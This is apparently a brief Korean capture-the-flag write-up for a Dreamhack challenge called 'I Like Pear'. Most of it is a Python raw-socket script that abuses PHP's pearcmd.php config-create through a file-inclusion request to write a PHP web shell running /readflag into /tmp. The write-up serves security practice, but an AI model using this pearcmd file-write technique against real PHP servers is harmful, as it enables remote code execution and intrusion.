I Like Pear 🍐

웹 소켓

으로 요청을 보내야 되는것 같다.

그냥 브라우저나 POSTMAN으로 요청을 보내면 인코딩 문제 때문인지 무슨 문제 때문인지 몰라도 제대로 되지 않는다.

아무튼 웹 소켓으로 페이로드를 짜서 보내면 된다.

import socket

# 서버와의 소켓 연결 설정
host = 'host1.dreamhack.games'  # 연결할 서버의 호스트명 또는 IP
port = 17169  # HTTP 기본 포트 (80)

# 소켓 생성 및 서버에 연결
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))

# HTTP 요청 작성
request = (
    "GET /?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?system('/readflag')?>+/tmp/index111.php HTTP/1.1\r\n"
    f"Host: {host}\r\n"
    "Connection: close\r\n"
    "\r\n"
)

# 요청 보내기
s.send(request.encode())

# 서버 응답 읽기
response = s.recv(9999999)
print(response.decode())

# 소켓 연결 종료
s.close()